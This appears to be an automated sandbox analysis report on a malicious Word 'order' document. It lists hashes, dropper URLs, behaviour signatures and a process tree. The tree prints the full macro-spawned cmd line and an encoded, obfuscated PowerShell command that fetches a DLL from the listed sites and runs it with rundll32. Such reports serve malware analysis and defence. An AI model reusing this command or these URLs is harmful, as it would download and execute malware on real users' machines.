Resubmissions

15-01-2021 09:25

210115-5vdjdbqvxe 10

15-01-2021 07:47

210115-5yp4gybvjn 10

15-01-2021 07:12

210115-nekg7v4ybs 10

Analysis

  • max time kernel
    286s
  • max time network
    277s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15-01-2021 09:25

General

  • Target

    Your order YL5088844988 13-01-2021.doc

  • Size

    92KB

  • MD5

    390cc36367632b99404bc3c610a83441

  • SHA1

    fdf27a70464fd442f858364503da83d64c48b686

  • SHA256

    fee13caa4b47e7859ada7207507b9d385aee0e14412cc738fed9465078ed2696

  • SHA512

    97a6868edf1534445a89ff13decaf694ac458a91253d6c7341d97bd7fe0d9e428a1cfe75b1144ab457106c7f38938a18cc530576c9c16c75b40ff35883b92a35

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tmsvinhphuc.com/wp-content/SpeechEngines/

exe.dropper

http://huzurdugunsalonu.com/wp-content/Speech/

exe.dropper

http://personal.unicorp.site/lang/System_32/

exe.dropper

http://christinewalker.org/wp-admin/Xt9SNHtExU/

exe.dropper

http://www.3d.unicorp.site/js/GzVpMLaH/

exe.dropper

http://3d.unicorp.site/js/A1ew/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Your order YL5088844988 13-01-2021.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1340
    • C:\Windows\system32\cmd.exe
      cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAGUATQAgACAAKAAnAFYAYQBSACcAKwAnAEkAYQBCACcAKwAnAEwAZQA6AEsANwBZACcAKwAnAHgAJwArACcAQgAnACkAIAAoACAAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewAxAH0AIgAgAC0ARgAgACcASQBPAC4AZAAnACwAJwBZACcALAAnAHMAWQBzAHQAZQBtAC4AJwAsACcAaQBSAGUAQwBUAG8AUgAnACkAIAAgACkAOwAkAFAAWQBmAFYATABJACAAIAA9ACAAIABbAFQAeQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAzAH0AewAyAH0AewA1AH0AewA2AH0AewAxAH0AIgAtAEYAIAAnAFMAWQBzAFQAZQAnACwAJwBHAEUAUgAnACwAJwBlAFQALgBzAGUAcgAnACwAJwAuAG4AJwAsACcATQAnACwAJwB2AEkAYwBlAFAAJwAsACcAbwBJAG4AVABNAGEATgBhACcAKQA7ACAAJABJAHoAZQB5AGMANgB4AD0AJABRADIAMgBTACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABPADIANwBVADsAJABKADIAMABHAD0AKAAoACcARAA3ACcAKwAnADAAJwApACsAJwBUACcAKQA7ACAAJABrADcAeQB4AGIAOgA6ACIAQwBgAFIAYABFAGEAVABlAGAARABpAFIARQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnADcAJwArACgAJwA0ACcAKwAnADEAVABpAGkAJwApACsAKAAnAHAAeAA2AGwANwAnACsAJwA0ADEAJwArACcASwBtACcAKQArACgAJwBnADcAJwArACcAdQBlAGcAJwApACsAKAAnADcAJwArACcANAAxACcAKQApACAALQBSAEUAcABMAEEAQwBFACAAKAAnADcANAAnACsAJwAxACcAKQAsAFsAYwBoAEEAUgBdADkAMgApACkAOwAkAFgAXwA4AFkAPQAoACgAJwBVACcAKwAnADYAOAAnACkAKwAnAEgAJwApADsAIAAoACAAIABHAGUAdAAtAGkAVABFAG0AIAAoACcAVgBhAHIAaQBhACcAKwAnAGIAbABFADoAcAB5ACcAKwAnAGYAVgBMACcAKwAnAEkAJwApACAAKQAuAHYAQQBsAHUAZQA6ADoAIgBzAEUAQwBVAFIAaQBgAFQAYABZAHAAUgBvAHQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABPADMANgBXAD0AKAAoACcAWQA5ACcAKwAnADAAJwApACsAJwBQACcAKQA7ACQAVgA0ADYAOABfAHEAcgAgAD0AIAAoACcAQwAnACsAKAAnADcANwAnACsAJwBFACcAKQApADsAJABFADMAMgBWAD0AKAAnAEcAJwArACgAJwA5ACcAKwAnADQASgAnACkAKQA7ACQAWgBqADUAcwBjAGUAbgA9ACQASABPAE0ARQArACgAKAAoACcAdwA2AFUAVAAnACsAJwBpACcAKwAnAGkAcAB4ADYAbAB3ADYAJwApACsAKAAnAFUAJwArACcASwBtAGcAJwApACsAKAAnADcAdQAnACsAJwBlAGcAdwA2ACcAKQArACcAVQAnACkALgAiAHIAZQBgAHAATABgAEEAQwBlACIAKAAoACcAdwA2ACcAKwAnAFUAJwApACwAWwBzAFQAcgBJAG4AZwBdAFsAYwBoAGEAUgBdADkAMgApACkAKwAkAFYANAA2ADgAXwBxAHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABTADYAMgBHAD0AKAAnAEEAJwArACgAJwA2ADQAJwArACcARQAnACkAKQA7ACQASwBfAHEAMAB0AGoAcgA9ACgAKAAnAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACgAJwB0AG0AcwB2ACcAKwAnAGkAbgBoAHAAJwApACsAKAAnAGgAdQBjAC4AYwBvAG0ALwB3ACcAKwAnAHAALQBjACcAKwAnAG8AJwApACsAKAAnAG4AJwArACcAdABlAG4AdAAnACsAJwAvAFMAJwApACsAJwBwAGUAJwArACcAZQAnACsAKAAnAGMAaABFAG4AJwArACcAZwBpAG4AJwApACsAKAAnAGUAcwAnACsAJwAvAEAAQQBdAFsAJwArACcAcQAnACsAJwBbACcAKQArACgAJwBEADoALwAvAGgAdQB6ACcAKwAnAHUAJwApACsAKAAnAHIAZAAnACsAJwB1ACcAKQArACgAJwBnACcAKwAnAHUAbgAnACkAKwAoACcAcwAnACsAJwBhAGwAJwApACsAJwBvACcAKwAoACcAbgAnACsAJwB1AC4AYwBvAG0ALwAnACkAKwAnAHcAcAAnACsAKAAnAC0AYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAvAFMAcAAnACkAKwAnAGUAZQAnACsAKAAnAGMAJwArACcAaAAvAEAAJwArACcAQQBdACcAKQArACgAJwBbAHEAJwArACcAWwBEACcAKQArACgAJwA6ACcAKwAnAC8ALwBwAGUAcgAnACkAKwAoACcAcwBvACcAKwAnAG4AJwArACcAYQBsAC4AdQBuAGkAYwAnACsAJwBvAHIAcAAuAHMAaQB0ACcAKwAnAGUALwAnACkAKwAoACcAbABhACcAKwAnAG4AZwAvACcAKwAnAFMAeQBzAHQAZQAnACkAKwAoACcAbQBfACcAKwAnADMAMgAvACcAKQArACcAQABBACcAKwAnAF0AWwAnACsAKAAnAHEAJwArACcAWwBEACcAKQArACcAOgAnACsAKAAnAC8ALwAnACsAJwBjAGgAcgAnACkAKwAoACcAaQAnACsAJwBzAHQAaQBuAGUAdwAnACsAJwBhAGwAJwApACsAJwBrAGUAJwArACgAJwByACcAKwAnAC4AbwByACcAKQArACgAJwBnAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkAG0AaQBuAC8AWAAnACsAJwB0ADkAJwApACsAJwBTACcAKwAoACcATgAnACsAJwBIAHQARQAnACkAKwAoACcAeAAnACsAJwBVAC8AQABBACcAKQArACgAJwBdAFsAcQBbACcAKwAnAEQAOgAvACcAKwAnAC8AdwB3ACcAKQArACcAdwAuACcAKwAoACcAMwAnACsAJwBkAC4AJwArACcAdQBuAGkAYwBvACcAKwAnAHIAcAAnACsAJwAuAHMAaQB0AGUALwAnACsAJwBqAHMAJwArACcALwBHAHoAVgBwAE0AJwApACsAKAAnAEwAYQBIAC8AJwArACcAQAAnACkAKwAnAEEAJwArACcAXQBbACcAKwAoACcAcQBbAEQAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnADMAZAAnACsAJwAuAHUAbgAnACkAKwAnAGkAJwArACgAJwBjACcAKwAnAG8AcgAnACkAKwAnAHAAJwArACgAJwAuAHMAaQAnACsAJwB0ACcAKQArACgAJwBlAC8AagBzAC8AJwArACcAQQAxACcAKwAnAGUAdwAnACkAKwAnAC8AJwApAC4AIgBSAGAARQBQAGwAYABBAGMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkAHMAJwArACcAZQB3ACcAKQArACcAZgAnACkALAAoACgAJwB3AGUAJwArACcAdgAnACkAKwAnAHcAZQAnACkAKQAsACgAKAAnAGEAZQAnACsAJwBmACcAKQArACcAZgAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQARQA4AF8ARgAgACsAIAAkAEkAegBlAHkAYwA2AHgAIAArACAAJABLADgAMwBQACkAOwAkAEgANAA2AEwAPQAoACcAUAA1ACcAKwAnADAARwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEIAawB1AHoANQBfADkAIABpAG4AIAAkAEsAXwBxADAAdABqAHIAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAnACsAJwAtAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgBXAGUAQgBjAEwASQBlAG4AVAApAC4AIgBEAG8AYAB3AE4ATABgAG8AYABBAGQAZgBpAEwARQAiACgAJABCAGsAdQB6ADUAXwA5ACwAIAAkAFoAagA1AHMAYwBlAG4AKQA7ACQAVQAwADIATgA9ACgAJwBMADcAJwArACcAOABBACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABaAGoANQBzAGMAZQBuACkALgAiAGwAZQBuAGAAZwB0AGgAIgAgAC0AZwBlACAAMwAyADcAOQA4ACkAIAB7AC4AKAAnAHIAJwArACcAdQBuAGQAbABsADMAMgAnACkAIAAkAFoAagA1AHMAYwBlAG4ALAAoACcAUwAnACsAKAAnAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABPAFMAYABUAGAAUgBpAE4ARwAiACgAKQA7ACQASQA1ADQASQA9ACgAKAAnAEcAMAAnACsAJwAzACcAKQArACcAUQAnACkAOwBiAHIAZQBhAGsAOwAkAE4AOQA3AEMAPQAoACgAJwBBADgAJwArACcAXwAnACkAKwAnAEEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABSADEAMABDAD0AKAAnAE0ANQAnACsAJwAwAEQAJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\system32\msg.exe
        msg Admin /v Word experienced an error trying to open the file.
        2⤵
          PID:1924
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAGUATQAgACAAKAAnAFYAYQBSACcAKwAnAEkAYQBCACcAKwAnAEwAZQA6AEsANwBZACcAKwAnAHgAJwArACcAQgAnACkAIAAoACAAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewAxAH0AIgAgAC0ARgAgACcASQBPAC4AZAAnACwAJwBZACcALAAnAHMAWQBzAHQAZQBtAC4AJwAsACcAaQBSAGUAQwBUAG8AUgAnACkAIAAgACkAOwAkAFAAWQBmAFYATABJACAAIAA9ACAAIABbAFQAeQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAzAH0AewAyAH0AewA1AH0AewA2AH0AewAxAH0AIgAtAEYAIAAnAFMAWQBzAFQAZQAnACwAJwBHAEUAUgAnACwAJwBlAFQALgBzAGUAcgAnACwAJwAuAG4AJwAsACcATQAnACwAJwB2AEkAYwBlAFAAJwAsACcAbwBJAG4AVABNAGEATgBhACcAKQA7ACAAJABJAHoAZQB5AGMANgB4AD0AJABRADIAMgBTACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABPADIANwBVADsAJABKADIAMABHAD0AKAAoACcARAA3ACcAKwAnADAAJwApACsAJwBUACcAKQA7ACAAJABrADcAeQB4AGIAOgA6ACIAQwBgAFIAYABFAGEAVABlAGAARABpAFIARQBDAHQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnADcAJwArACgAJwA0ACcAKwAnADEAVABpAGkAJwApACsAKAAnAHAAeAA2AGwANwAnACsAJwA0ADEAJwArACcASwBtACcAKQArACgAJwBnADcAJwArACcAdQBlAGcAJwApACsAKAAnADcAJwArACcANAAxACcAKQApACAALQBSAEUAcABMAEEAQwBFACAAKAAnADcANAAnACsAJwAxACcAKQAsAFsAYwBoAEEAUgBdADkAMgApACkAOwAkAFgAXwA4AFkAPQAoACgAJwBVACcAKwAnADYAOAAnACkAKwAnAEgAJwApADsAIAAoACAAIABHAGUAdAAtAGkAVABFAG0AIAAoACcAVgBhAHIAaQBhACcAKwAnAGIAbABFADoAcAB5ACcAKwAnAGYAVgBMACcAKwAnAEkAJwApACAAKQAuAHYAQQBsAHUAZQA6ADoAIgBzAEUAQwBVAFIAaQBgAFQAYABZAHAAUgBvAHQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABPADMANgBXAD0AKAAoACcAWQA5ACcAKwAnADAAJwApACsAJwBQACcAKQA7ACQAVgA0ADYAOABfAHEAcgAgAD0AIAAoACcAQwAnACsAKAAnADcANwAnACsAJwBFACcAKQApADsAJABFADMAMgBWAD0AKAAnAEcAJwArACgAJwA5ACcAKwAnADQASgAnACkAKQA7ACQAWgBqADUAcwBjAGUAbgA9ACQASABPAE0ARQArACgAKAAoACcAdwA2AFUAVAAnACsAJwBpACcAKwAnAGkAcAB4ADYAbAB3ADYAJwApACsAKAAnAFUAJwArACcASwBtAGcAJwApACsAKAAnADcAdQAnACsAJwBlAGcAdwA2ACcAKQArACcAVQAnACkALgAiAHIAZQBgAHAATABgAEEAQwBlACIAKAAoACcAdwA2ACcAKwAnAFUAJwApACwAWwBzAFQAcgBJAG4AZwBdAFsAYwBoAGEAUgBdADkAMgApACkAKwAkAFYANAA2ADgAXwBxAHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABTADYAMgBHAD0AKAAnAEEAJwArACgAJwA2ADQAJwArACcARQAnACkAKQA7ACQASwBfAHEAMAB0AGoAcgA9ACgAKAAnAEEAJwArACcAXQBbAHEAJwArACcAWwBEADoALwAvACcAKQArACgAJwB0AG0AcwB2ACcAKwAnAGkAbgBoAHAAJwApACsAKAAnAGgAdQBjAC4AYwBvAG0ALwB3ACcAKwAnAHAALQBjACcAKwAnAG8AJwApACsAKAAnAG4AJwArACcAdABlAG4AdAAnACsAJwAvAFMAJwApACsAJwBwAGUAJwArACcAZQAnACsAKAAnAGMAaABFAG4AJwArACcAZwBpAG4AJwApACsAKAAnAGUAcwAnACsAJwAvAEAAQQBdAFsAJwArACcAcQAnACsAJwBbACcAKQArACgAJwBEADoALwAvAGgAdQB6ACcAKwAnAHUAJwApACsAKAAnAHIAZAAnACsAJwB1ACcAKQArACgAJwBnACcAKwAnAHUAbgAnACkAKwAoACcAcwAnACsAJwBhAGwAJwApACsAJwBvACcAKwAoACcAbgAnACsAJwB1AC4AYwBvAG0ALwAnACkAKwAnAHcAcAAnACsAKAAnAC0AYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAvAFMAcAAnACkAKwAnAGUAZQAnACsAKAAnAGMAJwArACcAaAAvAEAAJwArACcAQQBdACcAKQArACgAJwBbAHEAJwArACcAWwBEACcAKQArACgAJwA6ACcAKwAnAC8ALwBwAGUAcgAnACkAKwAoACcAcwBvACcAKwAnAG4AJwArACcAYQBsAC4AdQBuAGkAYwAnACsAJwBvAHIAcAAuAHMAaQB0ACcAKwAnAGUALwAnACkAKwAoACcAbABhACcAKwAnAG4AZwAvACcAKwAnAFMAeQBzAHQAZQAnACkAKwAoACcAbQBfACcAKwAnADMAMgAvACcAKQArACcAQABBACcAKwAnAF0AWwAnACsAKAAnAHEAJwArACcAWwBEACcAKQArACcAOgAnACsAKAAnAC8ALwAnACsAJwBjAGgAcgAnACkAKwAoACcAaQAnACsAJwBzAHQAaQBuAGUAdwAnACsAJwBhAGwAJwApACsAJwBrAGUAJwArACgAJwByACcAKwAnAC4AbwByACcAKQArACgAJwBnAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkAG0AaQBuAC8AWAAnACsAJwB0ADkAJwApACsAJwBTACcAKwAoACcATgAnACsAJwBIAHQARQAnACkAKwAoACcAeAAnACsAJwBVAC8AQABBACcAKQArACgAJwBdAFsAcQBbACcAKwAnAEQAOgAvACcAKwAnAC8AdwB3ACcAKQArACcAdwAuACcAKwAoACcAMwAnACsAJwBkAC4AJwArACcAdQBuAGkAYwBvACcAKwAnAHIAcAAnACsAJwAuAHMAaQB0AGUALwAnACsAJwBqAHMAJwArACcALwBHAHoAVgBwAE0AJwApACsAKAAnAEwAYQBIAC8AJwArACcAQAAnACkAKwAnAEEAJwArACcAXQBbACcAKwAoACcAcQBbAEQAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnADMAZAAnACsAJwAuAHUAbgAnACkAKwAnAGkAJwArACgAJwBjACcAKwAnAG8AcgAnACkAKwAnAHAAJwArACgAJwAuAHMAaQAnACsAJwB0ACcAKQArACgAJwBlAC8AagBzAC8AJwArACcAQQAxACcAKwAnAGUAdwAnACkAKwAnAC8AJwApAC4AIgBSAGAARQBQAGwAYABBAGMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkAHMAJwArACcAZQB3ACcAKQArACcAZgAnACkALAAoACgAJwB3AGUAJwArACcAdgAnACkAKwAnAHcAZQAnACkAKQAsACgAKAAnAGEAZQAnACsAJwBmACcAKQArACcAZgAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACkAWwAyAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQARQA4AF8ARgAgACsAIAAkAEkAegBlAHkAYwA2AHgAIAArACAAJABLADgAMwBQACkAOwAkAEgANAA2AEwAPQAoACcAUAA1ACcAKwAnADAARwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEIAawB1AHoANQBfADkAIABpAG4AIAAkAEsAXwBxADAAdABqAHIAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAnACsAJwAtAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgBXAGUAQgBjAEwASQBlAG4AVAApAC4AIgBEAG8AYAB3AE4ATABgAG8AYABBAGQAZgBpAEwARQAiACgAJABCAGsAdQB6ADUAXwA5ACwAIAAkAFoAagA1AHMAYwBlAG4AKQA7ACQAVQAwADIATgA9ACgAJwBMADcAJwArACcAOABBACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABaAGoANQBzAGMAZQBuACkALgAiAGwAZQBuAGAAZwB0AGgAIgAgAC0AZwBlACAAMwAyADcAOQA4ACkAIAB7AC4AKAAnAHIAJwArACcAdQBuAGQAbABsADMAMgAnACkAIAAkAFoAagA1AHMAYwBlAG4ALAAoACcAUwAnACsAKAAnAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABPAFMAYABUAGAAUgBpAE4ARwAiACgAKQA7ACQASQA1ADQASQA9ACgAKAAnAEcAMAAnACsAJwAzACcAKQArACcAUQAnACkAOwBiAHIAZQBhAGsAOwAkAE4AOQA3AEMAPQAoACgAJwBBADgAJwArACcAXwAnACkAKwAnAEEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABSADEAMABDAD0AKAAnAE0ANQAnACsAJwAwAEQAJwApAA==
          2⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:932
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll ShowDialogA
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:988
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll ShowDialogA
              4⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of WriteProcessMemory
              PID:672
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bdwkykrxf\aaukkcof.aam",ShowDialogA
                5⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:1632

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
        MD5

        5323b594d60815546b33c63285460b6a

        SHA1

        5950b1d20f10453051956c28bdbfb130f60120e2

        SHA256

        aa4563a7bc419e1154107338118c0667cc43dccdf453144ddcc32ea76d99f9fe

        SHA512

        e4e73ea5d20501d8d782b950cfc045e0b6c6eab15b7fb315e005013d4297468226205adc85c6a121ed6ff456dc912190b8e1e949b5781d71540b4a5e2b5d3986

      • \Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
        MD5

        5323b594d60815546b33c63285460b6a

        SHA1

        5950b1d20f10453051956c28bdbfb130f60120e2

        SHA256

        aa4563a7bc419e1154107338118c0667cc43dccdf453144ddcc32ea76d99f9fe

        SHA512

        e4e73ea5d20501d8d782b950cfc045e0b6c6eab15b7fb315e005013d4297468226205adc85c6a121ed6ff456dc912190b8e1e949b5781d71540b4a5e2b5d3986

      • \Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
        MD5

        5323b594d60815546b33c63285460b6a

        SHA1

        5950b1d20f10453051956c28bdbfb130f60120e2

        SHA256

        aa4563a7bc419e1154107338118c0667cc43dccdf453144ddcc32ea76d99f9fe

        SHA512

        e4e73ea5d20501d8d782b950cfc045e0b6c6eab15b7fb315e005013d4297468226205adc85c6a121ed6ff456dc912190b8e1e949b5781d71540b4a5e2b5d3986

      • \Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
        MD5

        5323b594d60815546b33c63285460b6a

        SHA1

        5950b1d20f10453051956c28bdbfb130f60120e2

        SHA256

        aa4563a7bc419e1154107338118c0667cc43dccdf453144ddcc32ea76d99f9fe

        SHA512

        e4e73ea5d20501d8d782b950cfc045e0b6c6eab15b7fb315e005013d4297468226205adc85c6a121ed6ff456dc912190b8e1e949b5781d71540b4a5e2b5d3986

      • \Users\Admin\Tiipx6l\Kmg7ueg\C77E.dll
        MD5

        5323b594d60815546b33c63285460b6a

        SHA1

        5950b1d20f10453051956c28bdbfb130f60120e2

        SHA256

        aa4563a7bc419e1154107338118c0667cc43dccdf453144ddcc32ea76d99f9fe

        SHA512

        e4e73ea5d20501d8d782b950cfc045e0b6c6eab15b7fb315e005013d4297468226205adc85c6a121ed6ff456dc912190b8e1e949b5781d71540b4a5e2b5d3986

      • memory/672-13-0x0000000000000000-mapping.dmp
      • memory/932-6-0x000000001ABC0000-0x000000001ABC1000-memory.dmp
        Filesize

        4KB

      • memory/932-9-0x000000001B6F0000-0x000000001B6F1000-memory.dmp
        Filesize

        4KB

      • memory/932-10-0x000000001C320000-0x000000001C321000-memory.dmp
        Filesize

        4KB

      • memory/932-8-0x0000000002350000-0x0000000002351000-memory.dmp
        Filesize

        4KB

      • memory/932-7-0x00000000023F0000-0x00000000023F1000-memory.dmp
        Filesize

        4KB

      • memory/932-5-0x0000000002310000-0x0000000002311000-memory.dmp
        Filesize

        4KB

      • memory/932-4-0x000007FEF4F90000-0x000007FEF597C000-memory.dmp
        Filesize

        9.9MB

      • memory/932-3-0x0000000000000000-mapping.dmp
      • memory/988-11-0x0000000000000000-mapping.dmp
      • memory/1340-20-0x0000000000000000-mapping.dmp
      • memory/1632-18-0x0000000000000000-mapping.dmp
      • memory/1924-2-0x0000000000000000-mapping.dmp
      • memory/1932-19-0x000007FEF5D50000-0x000007FEF5FCA000-memory.dmp
        Filesize

        2.5MB